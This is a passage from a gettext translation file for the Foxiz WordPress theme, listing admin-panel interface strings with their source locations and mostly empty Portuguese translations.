msgid "" "Enable or disable the popup notification when users add or remove a post." msgstr "" #: backend/panels/single-post.php:297 msgid "Enable or disable the post tags bar at the bottom of the post content." msgstr "" #: backend/panels/single-post.php:962 backend/panels/single-post.php:1100 #: backend/panels/single-post.php:1714 msgid "Enable or disable the print button." msgstr "" #: backend/panels/single-post.php:823 msgid "Enable or disable the print post button." msgstr "" #: backend/panels/privacy.php:15 msgid "Enable or disable the privacy bar." msgstr "" #: backend/panels/reaction.php:24 msgid "Enable or disable the reaction section at the end of single post pages." msgstr "" #: backend/single-metaboxes.php:840 msgid "Enable or disable the reaction section at the end of this post." msgstr "" #: backend/category-settings.php:426 backend/panels/block-classic.php:107 #: backend/panels/block-grid.php:107 backend/panels/block-grid.php:272 #: backend/panels/block-grid.php:437 backend/panels/block-grid.php:610 #: backend/panels/block-grid.php:797 backend/panels/block-list.php:115 #: backend/panels/block-list.php:288 backend/panels/block-list.php:469 #: backend/panels/block-list.php:664 backend/panels/blog-pages.php:454 #: backend/panels/blog-pages.php:941 backend/panels/blog-pages.php:1355 #: backend/panels/blog-pages.php:1763 backend/panels/blog-pages.php:2255 #: backend/panels/bookmark.php:353 backend/panels/bookmark.php:801 msgid "Enable or disable the read more button." msgstr "" #: backend/panels/single-post.php:1746 msgid "Enable or disable the reading indicator bar." msgstr "" #: backend/panels/single-post.php:668 msgid "Enable or disable the reading time info in the single post." msgstr "" #: backend/panels/single-post.php:1297 msgid "" "Enable or disable the related section at the footer in single post pages." msgstr "" #: backend/panels/woocommerce.php:138 msgid "enable or disable the review box in the single product page." msgstr "" #: backend/single-metaboxes.php:472 msgid "Enable or disable the review feature for this post." msgstr "" #: backend/panels/blog-pages.php:2419 msgid "Enable or disable the search form." msgstr "" #: backend/panels/header.php:196 msgid "Enable or disable the search icon in the header." msgstr "" #: backend/panels/header.php:533 msgid "Enable or disable the sign in button on the header." msgstr "" #: backend/panels/header.php:541 msgid "Enable or disable the sign in button on the mobile header." msgstr "" #: backend/panels/header-style.php:37 backend/panels/header-style.php:331 #: backend/panels/header-style.php:582 msgid "Enable or disable the social icons list at the end of the navigation." msgstr "" #: backend/panels/amp.php:104 backend/panels/footer.php:165 msgid "Enable or disable the social list in this section." msgstr "" #: backend/panels/header.php:374 msgid "Enable or disable the socials list." msgstr "" #: backend/panels/single-post.php:305 msgid "Enable or disable the sources bar at the bottom of the post content." msgstr "" #: backend/panels/header.php:83 msgid "Enable or disable the sticky feature for the main menu bar." msgstr "" #: backend/panels/blog-pages.php:99 msgid "Enable or disable the sub category list in the category header." msgstr "" #: backend/category-settings.php:113 msgid "Enable or disable the sub category list in this category header." msgstr "" #: backend/single-metaboxes.php:711 msgid "Enable or disable the table content for this post." msgstr "" #: backend/panels/table-contents.php:30 msgid "Enable or disable the table of content for the single post." msgstr "" #: backend/panels/table-contents.php:37 msgid "Enable or disable the table of content for the single." msgstr "" #: backend/single-metaboxes.php:920 msgid "Enable or disable the top ad site for this post." msgstr "" #: backend/single-metaboxes.php:682 msgid "Enable or disable the top entry widgets for this post." msgstr "" #: backend/panels/single-post.php:313 msgid "Enable or disable the via bar at the bottom of the post content." msgstr "" #: backend/panels/design.php:363 backend/panels/design.php:371 #: backend/panels/design.php:379 backend/panels/design.php:387 #: backend/panels/design.php:395 msgid "Enable or disable this image crop size." msgstr "" #: backend/panels/general.php:18 msgid "Enable or disable tooltips when hovering on icons." msgstr "" #: backend/panels/single-post.php:707 msgid "" "Enable or disable top share section. This section will display below the " "single entry meta info." msgstr "" #: backend/panels/single-post.php:1220 msgid "" "Enable or disable visitors can rate and review all posts in the comment box." msgstr "" #: backend/panels/single-post.php:1176 msgid "Enable or disable visitors can rate and review on the post review." msgstr "" #: backend/single-metaboxes.php:484 msgid "" "Enable or disable visitors can rate and review this post in the comment box." msgstr "" #: backend/panels/optimized.php:130 msgid "" "Enable or disable website markup, helps to show the Search Box feature for " "brand SERPs and can help your website name to appear in search results." msgstr "" #: backend/panels/sidebar.php:56 msgid "Enable or disable widget block editor (WordPress 5.8 or above)." msgstr "" #: backend/panels/login.php:26 msgid "Enable or disable wp-login.php page style." msgstr "" #: backend/panels/optimized.php:145 msgid "Enable the Carousels (Item List) schema markup for your Homepage." msgstr "" #: backend/panels/optimized.php:83 msgid "Enable this option if all fonts in Typography panels is set." msgstr "" #: backend/panels/single-post.php:489 msgid "" "Enable this option if you would like to only show the primary category in " "the single post." msgstr "" #: backend/panels/bookmark.php:51 backend/panels/table-contents.php:125 msgid "Enable When" msgstr "" #: backend/single-metaboxes.php:489 msgid "Enable with Review" msgstr "" #: backend/panels/single-post.php:1180 msgid "Enable without Post Review" msgstr "" #: backend/panels/header.php:205 msgid "" "Ensure the option \"More Menu - Search Form\" is enabled when you select the " "\"More Menu Triggered\" option." msgstr "" #: backend/panels/header.php:286 msgid "" "Ensure this section set to Light Text if you select a dark sub-menu " "background." msgstr "" #: backend/panels/header.php:327 msgid "" "Ensure you have also set \"Dark Mode Colors\" if you use custom colors for " "the default mode." msgstr "" #: backend/panels/block-classic.php:39 backend/panels/block-grid.php:39 #: backend/panels/block-grid.php:204 backend/panels/block-grid.php:369 #: backend/panels/block-grid.php:542 backend/panels/block-grid.php:729 #: backend/panels/block-list.php:47 backend/panels/block-list.php:220 #: backend/panels/block-list.php:401 backend/panels/block-list.php:596 #: backend/panels/blog-pages.php:364 backend/panels/blog-pages.php:851 #: backend/panels/blog-pages.php:1265 backend/panels/blog-pages.php:1673 #: backend/panels/blog-pages.php:2165 backend/panels/bookmark.php:264 #: backend/panels/bookmark.php:712 backend/panels/design.php:31 #: backend/panels/single-post.php:470 backend/panels/single-post.php:479 #: backend/panels/typography.php:415 msgid "Entry Category" msgstr "" #: backend/category-settings.php:25 msgid "Entry Category Colors" msgstr "" #: backend/panels/typography.php:423 msgid "Entry Category Font" msgstr "" #: backend/panels/single-post.php:497 msgid "Entry Category Font Size" msgstr "" #: backend/panels/typography.php:75 msgid "Entry Excerpt" msgstr "" #: backend/panels/design.php:89 backend/panels/single-post.php:560 #: backend/panels/typography.php:464 msgid "Entry Meta" msgstr "" #: backend/category-settings.php:345 backend/panels/blog-pages.php:374 #: backend/panels/blog-pages.php:861 backend/panels/blog-pages.php:1275 #: backend/panels/blog-pages.php:1683 backend/panels/blog-pages.php:2175 #: backend/panels/bookmark.php:273 backend/panels/bookmark.php:721 msgid "Entry Meta Bar" msgstr "" #: backend/panels/typography.php:472 msgid "Entry Meta Font" msgstr "" #: backend/panels/design.php:98 msgid "Entry Meta Icons" msgstr "" #: backend/panels/single-post.php:570 msgid "Entry Meta Settings" msgstr "" #: backend/category-settings.php:358 backend/panels/block-classic.php:49 #: backend/panels/block-grid.php:49 backend/panels/block-grid.php:214 #: backend/panels/block-grid.php:379 backend/panels/block-grid.php:552 #: backend/panels/block-grid.php:739 backend/panels/block-list.php:57 #: backend/panels/block-list.php:230 backend/panels/block-list.php:411 #: backend/panels/block-list.php:606 backend/panels/blog-pages.php:383 #: backend/panels/blog-pages.php:870 backend/panels/blog-pages.php:1284 #: backend/panels/blog-pages.php:1692 backend/panels/blog-pages.php:2184 #: backend/panels/bookmark.php:282 backend/panels/bookmark.php:730 #: backend/panels/single-post.php:585 msgid "Entry Meta Tags" msgstr "" #: backend/single-metaboxes.php:676 msgid "Entry Widgets" msgstr "" #: backend/category-settings.php:397 backend/panels/blog-pages.php:424 #: backend/panels/blog-pages.php:911 backend/panels/blog-pages.php:1325 #: backend/panels/blog-pages.php:1733 backend/panels/blog-pages.php:2225 #: backend/panels/bookmark.php:323 backend/panels/bookmark.php:771 msgid "Excerpt" msgstr "" #: backend/category-settings.php:408 backend/panels/block-classic.php:90 #: backend/panels/block-grid.php:90 backend/panels/block-grid.php:255 #: backend/panels/block-grid.php:420 backend/panels/block-grid.php:593 #: backend/panels/block-grid.php:780 backend/panels/block-list.php:98 #: backend/panels/block-list.php:271 backend/panels/block-list.php:452 #: backend/panels/block-list.php:647 backend/panels/blog-pages.php:434 #: backend/panels/blog-pages.php:921 backend/panels/blog-pages.php:1335 #: backend/panels/blog-pages.php:1743 backend/panels/blog-pages.php:2235 #: backend/panels/bookmark.php:333 backend/panels/bookmark.php:781 msgid "Excerpt - Max Length" msgstr "" #: backend/category-settings.php:416 backend/panels/block-classic.php:97 #: backend/panels/block-grid.php:97 backend/panels/block-grid.php:262 #: backend/panels/block-grid.php:427 backend/panels/block-grid.php:600 #: backend/panels/block-grid.php:787 backend/panels/block-list.php:105 #: backend/panels/block-list.php:278 backend/panels/block-list.php:459 #: backend/panels/block-list.php:654 backend/panels/blog-pages.php:442 #: backend/panels/blog-pages.php:929 backend/panels/blog-pages.php:1343 #: backend/panels/blog-pages.php:1751 backend/panels/blog-pages.php:2243 #: backend/panels/bookmark.php:341 backend/panels/bookmark.php:789 msgid "Excerpt - Source" msgstr "" #: backend/panels/color.php:123 msgid "Excerpt Color" msgstr "" #: backend/category-settings.php:219 msgid "" "Exclude tag slugs for the latest blog. Separated by commas (for example: " "tagslug1,tagslug2,tagslug3)." msgstr "" #: backend/category-settings.php:218 msgid "Exclude Tags Slug" msgstr "" #: backend/class-tgm-plugin-activation.php:2389 msgid "External Source" msgstr "" #: backend/panels/single-post.php:723 backend/panels/single-post.php:862 #: backend/panels/single-post.php:1000 backend/panels/single-post.php:1633 #: templates/parts.php:591 msgid "Facebook" msgstr "" #: backend/panels/optimized.php:244 msgid "Facebook APP ID" msgstr "" #: backend/panels/optimized.php:253 msgid "Facebook Default Image" msgstr "" #: backend/panels/socials.php:28 msgid "Facebook URL" msgstr "" #: backend/panels/design.php:446 msgid "Fade" msgstr "" #: backend/single-metaboxes.php:667 msgid "Fake View Value" msgstr "" #: backend/panels/design.php:265 msgid "Fallback Meta" msgstr "" #: backend/single-metaboxes.php:251 msgid "Featured Caption" msgstr "" #: backend/single-metaboxes.php:243 msgid "Featured Crop Size" msgstr "" #: backend/panels/design.php:639 msgid "Featured GIF" msgstr "" #: backend/panels/design.php:294 backend/single-metaboxes.php:238 msgid "Featured Image" msgstr "" #: backend/category-settings.php:328 backend/panels/block-classic.php:31 #: backend/panels/block-grid.php:31 backend/panels/block-grid.php:196 #: backend/panels/block-grid.php:361 backend/panels/block-grid.php:534 #: backend/panels/block-grid.php:721 backend/panels/block-list.php:31 #: backend/panels/block-list.php:204 backend/panels/block-list.php:385 #: backend/panels/block-list.php:580 backend/panels/blog-pages.php:349 #: backend/panels/blog-pages.php:836 backend/panels/blog-pages.php:1250 #: backend/panels/blog-pages.php:1658 backend/panels/blog-pages.php:2150 #: backend/panels/bookmark.php:249 backend/panels/bookmark.php:697 msgid "Featured Image Size" msgstr "" #: backend/category-settings.php:86 msgid "Featured Images" msgstr "" #: backend/panels/block-list.php:39 backend/panels/block-list.php:212 #: backend/panels/block-list.php:393 backend/panels/block-list.php:588 msgid "Featured Position" msgstr "" #: backend/single-metaboxes.php:574 msgid "Final Summary" msgstr "" #: templates/blog.php:94 msgid "Find More:" msgstr "Encontrar mais" #: backend/panels/privacy.php:26 msgid "Fixed Bottom" msgstr "" #: backend/panels/amp.php:332 backend/panels/amp.php:392 #: backend/panels/amp.php:452 backend/panels/amp.php:513 #: backend/panels/amp.php:573 msgid "Fixed Height (90px)" msgstr "" #: backend/panels/privacy.php:24 msgid "Fixed Left" msgstr "" #: backend/panels/single-post.php:975 msgid "Fixed Left Area" msgstr "" #: backend/panels/amp.php:186 backend/panels/single-post.php:983 msgid "Fixed Left Share Bar" msgstr "" #: templates/parts.php:612 msgid "Flickr" msgstr "" #: backend/panels/socials.php:74 msgid "Flickr URL" msgstr "" #: backend/panels/ads.php:421 msgid "Float Left" msgstr "" #: backend/panels/ads.php:422 msgid "Float Right" msgstr "" #: backend/panels/single-post.php:82 msgid "Floating Video" msgstr "" #: backend/panels/single-post.php:83 msgid "Floating video on the screen on scroll." msgstr "" #: templates/parts.php:802 msgid "Follow" msgstr "" #: backend/panels/bookmark.php:456 msgid "Follow categories that you're interested in" msgstr "" #: backend/panels/bookmark.php:477 msgid "Follow Page URL" msgstr "" #: templates/footer.php:212 templates/header/templates.php:621 msgid "Follow US" msgstr "Nos siga nas redes sociais" #: templates/blog.php:465 templates/entry.php:1171 msgid "Follow: " msgstr "" #: backend/panels/design.php:704 msgid "Font Awesome" msgstr "" #: backend/panels/typography.php:91 msgid "Font Size" msgstr "" #: backend/panels/footer.php:15 msgid "Footer" msgstr "" #: backend/panels/amp.php:360 msgid "Footer - Ad Type" msgstr "" #: backend/panels/amp.php:388 msgid "Footer - Adsense Size" msgstr "" #: backend/panels/amp.php:400 msgid "Footer - AMP Custom Ad Script" msgstr "" #: includes/sidebars.php:105 msgid "Footer - Column 1" msgstr "" #: includes/sidebars.php:114 msgid "Footer - Column 2" msgstr "" #: includes/sidebars.php:123 msgid "Footer - Column 3" msgstr "" #: includes/sidebars.php:133 msgid "Footer - Column 4" msgstr "" #: includes/sidebars.php:144 msgid "Footer - Column 5" msgstr "" #: backend/panels/amp.php:372 msgid "Footer - Data Ad Client" msgstr "" #: backend/panels/amp.php:380 msgid "Footer - Data Ad Slot" msgstr "" #: includes/sidebars.php:96 msgid "Footer - Top Full Width" msgstr "" #: backend/panels/amp.php:354 msgid "Footer Ad Settings" msgstr "" #: backend/panels/single-post.php:290 msgid "Footer Area" msgstr "" #: backend/panels/footer.php:30 msgid "Footer Background" msgstr "" #: backend/panels/footer.php:136 msgid "Footer Bottom Section" msgstr "" #: backend/panels/header.php:156 backend/panels/header.php:388 msgid "Footer Copyright" msgstr "" #: backend/panels/footer.php:144 msgid "Footer Logo" msgstr "" #: backend/panels/header.php:149 backend/panels/header.php:381 msgid "Footer Menu" msgstr "" #: backend/panels/ads.php:454 msgid "Footer Slide Up" msgstr "" #: backend/panels/ads.php:462 msgid "Footer Slide Up Section" msgstr "" #: backend/panels/footer.php:23 msgid "Footer Style" msgstr "" #: backend/single-metaboxes.php:172 backend/single-metaboxes.php:949 msgid "Footer Template Shortcode" msgstr "" #: backend/panels/newsletter.php:55 msgid "Footer Text" msgstr "" #: backend/panels/newsletter.php:62 msgid "Footer URL" msgstr "" #: backend/panels/heading.php:104 msgid "Footer Widget Heading Layout" msgstr "" #: backend/panels/footer.php:80 msgid "Footer Widget Section" msgstr "" #: backend/panels/footer.php:120 msgid "Footer Widgets - Template Shortcode" msgstr "" #: backend/panels/footer.php:90 msgid "Footer Widgets Layout" msgstr "" #: backend/single-metaboxes.php:490 msgid "Force Enable for This Post" msgstr "" #: backend/panels/optimized.php:90 msgid "Force write Dynamic CSS to file" msgstr "" #: backend/panels/header.php:565 msgid "Form Description" msgstr "" #: backend/panels/header.php:558 msgid "Form Heading" msgstr "" #: backend/panels/header.php:572 msgid "Form Logo" msgstr "" #: backend/category-settings.php:18 msgid "Foxiz - Individual Category Settings" msgstr "" #: backend/install-plugins.php:19 msgid "Foxiz Core" msgstr "" #: backend/theme-options.php:219 msgid "Foxiz Panel" msgstr "" #: backend/install-plugins.php:71 #, php-format msgid "Foxiz recommends the following plugin: %1$s." msgstr "" #: backend/install-plugins.php:70 #, php-format msgid "Foxiz the following plugin: %1$s." msgstr "" #: backend/panels/design.php:318 msgid "From The Center" msgstr "" #: backend/panels/design.php:317 msgid "From The Top" msgstr "" #: backend/panels/ads.php:420 backend/panels/page.php:46 #: backend/panels/single-post.php:174 backend/panels/single-post.php:186 #: backend/single-metaboxes.php:75 msgid "Full Width" msgstr "" #: backend/panels/table-contents.php:116 backend/single-metaboxes.php:729 msgid "Full Width (1 Column)" msgstr "" #: backend/panels/header-style.php:61 backend/panels/header-style.php:355 #: backend/panels/header-style.php:605 msgid "Full Width (100%)" msgstr "" #: backend/panels/table-contents.php:114 backend/single-metaboxes.php:727 msgid "Full Width (2 Columns)" msgstr "" #: backend/panels/typography.php:704 msgid "Full Width Headline" msgstr "" #: backend/panels/typography.php:761 msgid "Full Width Tagline" msgstr "" #: backend/panels/design.php:362 msgid "G1- 330x220" msgstr "" #: backend/panels/design.php:370 msgid "G2 - 420x280" msgstr "" #: backend/panels/design.php:378 msgid "G3 - 615x410" msgstr "" #: backend/single-metaboxes.php:418 msgid "Gallery Format" msgstr "" #: backend/panels/design.php:484 msgid "Gallery Icon" msgstr "" #: backend/panels/design.php:507 msgid "Gallery Icon Color" msgstr "" #: backend/panels/single-post.php:132 backend/single-metaboxes.php:424 msgid "Gallery Layout" msgstr "" #: backend/panels/single-post.php:126 msgid "Gallery Post Format Layout" msgstr "" #: backend/panels/amp.php:40 backend/panels/bookmark.php:28 #: backend/panels/general.php:10 backend/panels/header.php:31 #: backend/panels/single-post.php:1590 msgid "General" msgstr "" #: backend/panels/design.php:303 backend/panels/header-style.php:24 #: backend/panels/header-style.php:318 backend/panels/header-style.php:569 #: backend/panels/page.php:24 backend/single-metaboxes.php:51 msgid "General Settings" msgstr "" #: backend/panels/general.php:11 msgid "General settings for your website." msgstr "" #: backend/panels/design.php:647 msgid "GIF Supported" msgstr "" #: backend/category-settings.php:150 backend/panels/blog-pages.php:148 #: backend/panels/blog-pages.php:685 backend/panels/blog-pages.php:1101 #: backend/panels/blog-pages.php:1509 backend/panels/blog-pages.php:2002 msgid "Global Blog Template Builder" msgstr "" #: backend/panels/color.php:15 msgid "Global Colors" msgstr "" #: backend/panels/header.php:50 msgid "Global Header Style" msgstr "" #: backend/panels/header.php:59 msgid "Global Header Template Shortcode" msgstr "" #: backend/panels/heading.php:35 msgid "Global Heading" msgstr "" #: backend/panels/heading.php:40 msgid "Global Heading Layout" msgstr "" #: backend/panels/color.php:28 msgid "Global Highlight Color" msgstr "" #: backend/panels/general.php:34 msgid "Global Search Placeholder" msgstr "" #: backend/panels/breadcrumb.php:23 msgid "Global Setting" msgstr "" #: backend/panels/sidebar.php:26 msgid "Global Sidebar Position" msgstr "" #: backend/panels/header.php:40 msgid "Global Site Header" msgstr "" #: backend/category-settings.php:155 backend/panels/blog-pages.php:153 #: backend/panels/blog-pages.php:691 backend/panels/blog-pages.php:1106 #: backend/panels/blog-pages.php:1515 backend/panels/blog-pages.php:2007 msgid "Global WP Query Template Shortcode" msgstr "" #: templates/single/review-comment.php:91 msgid "Good" msgstr "" #: templates/single/reviews.php:175 msgid "Good Stuff" msgstr "" #: backend/panels/block-grid.php:27 backend/panels/block-grid.php:192 msgid "grid" msgstr "" #: backend/panels/single-post.php:1340 msgid "Grid 1 (3 Columns)" msgstr "" #: backend/category-settings.php:244 backend/configs.php:451 #: backend/panels/block-grid.php:17 msgid "Grid 1 (Standard)" msgstr "" #: backend/category-settings.php:245 backend/configs.php:455 #: backend/panels/block-grid.php:182 msgid "Grid 2" msgstr "" #: backend/panels/bookmark.php:54 msgid "Guest and Logged Users" msgstr "" #: backend/panels/bookmark.php:71 msgid "Guest Bookmark Expiration" msgstr "" #: backend/configs.php:237 msgid "H1" msgstr "" #: backend/panels/typography.php:129 msgid "H1 Font" msgstr "" #: backend/panels/typography.php:121 msgid "H1 Tag" msgstr "" #: backend/configs.php:238 backend/panels/single-post.php:532 #: backend/single-metaboxes.php:224 msgid "H2" msgstr "" #: backend/panels/typography.php:178 msgid "H2 Font" msgstr "" #: backend/panels/typography.php:170 msgid "H2 Tag" msgstr "" #: backend/configs.php:239 backend/panels/single-post.php:533 #: backend/single-metaboxes.php:225 msgid "H3" msgstr "" #: backend/panels/typography.php:227 msgid "H3 Font" msgstr "" #: backend/panels/typography.php:219 msgid "H3 Tag" msgstr "" #: backend/configs.php:240 backend/panels/single-post.php:534 #: backend/single-metaboxes.php:226 msgid "H4" msgstr "" #: backend/panels/typography.php:276 msgid "H4 Font" msgstr "" #: backend/panels/typography.php:268 msgid "H4 Tag" msgstr "" #: backend/configs.php:241 backend/panels/single-post.php:535 #: backend/single-metaboxes.php:227 msgid "H5" msgstr "" #: backend/panels/typography.php:325 msgid "H5 Font" msgstr "" #: backend/panels/typography.php:317 msgid "H5 Tag" msgstr "" #: backend/configs.php:242 backend/panels/single-post.php:536 #: backend/single-metaboxes.php:228 msgid "H6" msgstr "" #: backend/panels/typography.php:374 msgid "H6 Font" msgstr "" #: backend/panels/typography.php:366 msgid "H6 Tag" msgstr "" #: backend/configs.php:844 msgid "Half banner (234x60)" msgstr "" #: backend/configs.php:854 msgid "Half Page (300x600)" msgstr "" #: backend/panels/table-contents.php:115 backend/single-metaboxes.php:728 msgid "Half Width" msgstr "" #: backend/panels/reaction.php:44 msgid "Happy" msgstr "" #: templates/header/templates.php:615 msgid "Have an existing account?" msgstr "" #: backend/panels/header.php:16 msgid "Header" msgstr "" #: backend/panels/amp.php:300 msgid "Header - Ad Type" msgstr "" #: backend/panels/amp.php:328 msgid "Header - Adsense Size" msgstr "" #: backend/panels/amp.php:340 msgid "Header - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:312 msgid "Header - Data Ad Client" msgstr "" #: backend/panels/amp.php:320 msgid "Header - Data Ad Slot" msgstr "" #: backend/panels/amp.php:294 msgid "Header Ad Settings" msgstr "" #: includes/sidebars.php:79 msgid "Header Advertising" msgstr "" #: backend/single-metaboxes.php:153 backend/single-metaboxes.php:930 msgid "Header Alert Bar" msgstr "" #: backend/panels/blog-pages.php:1968 backend/panels/header.php:408 #: backend/panels/header.php:462 msgid "Header Background" msgstr "" #: backend/category-settings.php:92 backend/panels/blog-pages.php:90 #: backend/panels/blog-pages.php:1084 backend/panels/blog-pages.php:1492 msgid "Header Background Style" msgstr "" #: backend/panels/header-style.php:80 msgid "Header Height" msgstr "" #: backend/panels/blog-pages.php:2390 msgid "Header Image" msgstr "" #: backend/panels/typography.php:893 msgid "Header Menus" msgstr "" #: backend/panels/header.php:738 msgid "Header Mini Cart" msgstr "" #: backend/panels/header.php:173 msgid "Header Search" msgstr "" #: backend/panels/header.php:195 msgid "Header Search Icon" msgstr "" #: backend/category-settings.php:56 backend/panels/blog-pages.php:37 #: backend/panels/blog-pages.php:603 backend/panels/blog-pages.php:1921 #: backend/panels/single-post.php:1555 backend/single-metaboxes.php:890 msgid "Header Style" msgstr "" #: backend/panels/header-style.php:15 msgid "Header Style 1,2,3" msgstr "" #: backend/panels/header-style.php:309 msgid "Header Style 4" msgstr "" #: backend/panels/header-style.php:560 msgid "Header Style 5" msgstr "" #: backend/category-settings.php:64 backend/panels/blog-pages.php:60 #: backend/panels/blog-pages.php:626 backend/panels/blog-pages.php:1944 #: backend/panels/woocommerce.php:60 backend/single-metaboxes.php:121 #: backend/single-metaboxes.php:898 msgid "Header Template Shortcode" msgstr "" #: backend/panels/header-style.php:56 backend/panels/header-style.php:350 #: backend/panels/header-style.php:601 msgid "Header Width" msgstr "" #: backend/category-settings.php:182 backend/panels/blog-pages.php:204 #: backend/panels/blog-pages.php:2404 msgid "Heading" msgstr "" #: backend/panels/bookmark.php:133 backend/panels/bookmark.php:483 msgid "Heading background Style" msgstr "" #: backend/panels/heading.php:129 msgid "Heading Color" msgstr "" #: backend/panels/heading.php:15 msgid "Heading Design" msgstr "" #: backend/panels/typography.php:1038 msgid "Heading Font" msgstr "" #: backend/category-settings.php:205 backend/panels/blog-pages.php:227 #: backend/panels/bookmark.php:540 backend/panels/single-post.php:1327 msgid "Heading Font Size (Desktop)" msgstr "" #: backend/category-settings.php:197 backend/panels/blog-pages.php:219 #: backend/panels/bookmark.php:532 backend/panels/single-post.php:1319 msgid "Heading HTML Tag" msgstr "" #: backend/category-settings.php:189 backend/panels/blog-pages.php:211 #: backend/panels/bookmark.php:524 backend/panels/single-post.php:1311 msgid "Heading Layout" msgstr "" #: backend/panels/table-contents.php:50 msgid "Heading Tag Supported" msgstr "" #: backend/panels/typography.php:1039 msgid "" "Heading tag will use default H tag font settings. Select font values if you " "would like to choose a custom font." msgstr "" #: backend/single-metaboxes.php:750 msgid "Headings Table" msgstr "" #: templates/header/templates.php:289 msgid "Hi," msgstr "" #: backend/panels/single-post.php:1442 msgid "" "Hide a part of content of next posts and show the button to increase page " "views." msgstr "" #: backend/panels/single-post.php:402 msgid "Hide Next/Prev Post pagination on the mobile device." msgstr "" #: backend/configs.php:861 msgid "Hide on Desktop" msgstr "" #: backend/panels/single-post.php:1465 msgid "Hide Sidebar on Mobile" msgstr "" #: backend/category-settings.php:466 backend/panels/block-classic.php:130 #: backend/panels/block-grid.php:130 backend/panels/block-grid.php:295 #: backend/panels/block-grid.php:460 backend/panels/block-grid.php:633 #: backend/panels/block-grid.php:820 backend/panels/block-list.php:138 #: backend/panels/block-list.php:311 backend/panels/block-list.php:492 #: backend/panels/block-list.php:687 backend/panels/blog-pages.php:491 #: backend/panels/blog-pages.php:978 backend/panels/blog-pages.php:1392 #: backend/panels/blog-pages.php:1800 backend/panels/blog-pages.php:2292 #: backend/panels/bookmark.php:390 backend/panels/bookmark.php:838 msgid "Hide the entry category on the tablet and mobile devices." msgstr "" #: backend/category-settings.php:496 backend/panels/block-classic.php:156 #: backend/panels/block-grid.php:156 backend/panels/block-grid.php:321 #: backend/panels/block-grid.php:486 backend/panels/block-grid.php:659 #: backend/panels/block-grid.php:846 backend/panels/block-list.php:164 #: backend/panels/block-list.php:337 backend/panels/block-list.php:518 #: backend/panels/block-list.php:713 backend/panels/blog-pages.php:521 #: backend/panels/blog-pages.php:1008 backend/panels/blog-pages.php:1422 #: backend/panels/blog-pages.php:1830 backend/panels/blog-pages.php:2322 #: backend/panels/bookmark.php:412 backend/panels/bookmark.php:868 msgid "Hide the post excerpt on the tablet and mobile devices." msgstr "" #: backend/panels/single-post.php:1466 msgid "Hide the post sidebar on the mobile device when load next posts." msgstr "" #: backend/panels/header.php:712 msgid "Hide this bar on the sticky navigation." msgstr "" #: backend/panels/header.php:711 msgid "Hide when Sticky" msgstr "" #: backend/mega-menu.php:142 msgid "Hierarchical" msgstr "" #: backend/category-settings.php:30 backend/panels/design.php:44 msgid "Highlight Color" msgstr "" #: backend/panels/color.php:23 msgid "Highlight Colors" msgstr "" #: backend/panels/single-post.php:544 msgid "Highlight Heading" msgstr "" #: backend/single-metaboxes.php:212 msgid "Highlight Point" msgstr "" #: backend/panels/single-post.php:1490 backend/panels/single-post.php:1499 msgid "Highlight Shares" msgstr "" #: backend/panels/single-post.php:546 msgid "Highlights" msgstr "" #: backend/panels/optimized.php:181 msgid "Home Description" msgstr "" #: backend/panels/header-style.php:140 backend/panels/header-style.php:218 #: backend/panels/header-style.php:284 backend/panels/header-style.php:428 #: backend/panels/header-style.php:507 backend/panels/header-style.php:695 #: backend/panels/header-style.php:773 msgid "Hover Accent Color" msgstr "" #: backend/panels/design.php:567 msgid "Hover Effects" msgstr "" #: backend/panels/header-style.php:132 backend/panels/header-style.php:210 #: backend/panels/header-style.php:276 backend/panels/header-style.php:420 #: backend/panels/header-style.php:499 backend/panels/header-style.php:687 #: backend/panels/header-style.php:765 msgid "Hover Text Color" msgstr "" #: backend/panels/single-post.php:529 msgid "HTML Tag" msgstr "" #: backend/panels/design.php:180 msgid "Human Time Format" msgstr "" #: backend/panels/single-post.php:218 msgid "Hyperlink Color" msgstr "" #: backend/panels/single-post.php:200 msgid "Hyperlink Settings" msgstr "" #: backend/panels/single-post.php:205 msgid "Hyperlink Style" msgstr "" #: backend/panels/single-post.php:234 msgid "Hyperlink Underline" msgstr "" #: backend/panels/header.php:550 msgid "Icon" msgstr "" #: backend/mega-menu.php:238 msgid "Icon Classname" msgstr "" #: backend/panels/ads.php:39 msgid "" "If you use auto ads code, you need to disable any other adsense units code." msgstr "" #: backend/panels/design.php:246 msgid "" "If you use font Awesome. ensure that the setting in \"Theme Design > Font " "Awesome\" is enabled." msgstr "" #: backend/single-metaboxes.php:344 backend/single-metaboxes.php:392 msgid "Iframe Embed Code" msgstr "" #: backend/panels/dark-mode.php:35 msgid "Image Opacity" msgstr "" #: backend/panels/typography.php:488 msgid "Important Meta Font" msgstr "" #: backend/panels/header-style.php:89 backend/panels/header-style.php:377 #: backend/panels/header-style.php:644 msgid "" "In case you would like to switch layout and text to light when set a dark " "background for sub menu in light mode." msgstr "" #: backend/panels/single-post.php:1374 msgid "Infinite Scroll" msgstr "" #: backend/configs.php:563 backend/panels/bookmark.php:575 msgid "Infinite Scroll (Ajax)" msgstr "" #: backend/panels/amp.php:541 msgid "Inline - Ad Type" msgstr "" #: backend/panels/amp.php:569 msgid "Inline - Adsense Size" msgstr "" #: backend/panels/amp.php:581 msgid "Inline - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:553 msgid "Inline - Data Ad Client" msgstr "" #: backend/panels/amp.php:561 msgid "Inline - Data Ad Slot" msgstr "" #: backend/panels/single-post.php:1259 msgid "Inline Content Related Box" msgstr "" #: backend/panels/ads.php:265 msgid "Inline Single Content" msgstr "" #: backend/panels/amp.php:535 msgid "Inline Single Content Ad Settings" msgstr "" #: backend/panels/typography.php:593 msgid "Input & Textarea Font" msgstr "" #: backend/panels/blog-pages.php:154 backend/panels/blog-pages.php:1107 #: backend/panels/blog-pages.php:1516 backend/panels/blog-pages.php:2008 msgid "" "Input a \"Ruby Template\" shortcode to display as the main blog posts, ie: " "[Ruby_E_Template id=\"1\"]." msgstr "" #: backend/panels/blog-pages.php:120 msgid "" "Input a \"Ruby Template\" shortcode to embed it after the category header, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:130 msgid "" "Input a \"Ruby Template\" shortcode to embed it after this category header, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:659 msgid "" "Input a \"Ruby Template\" shortcode to embed it the bottom of the blog page, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:650 msgid "" "Input a \"Ruby Template\" shortcode to embed it the top of the blog page, ie:" " [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:156 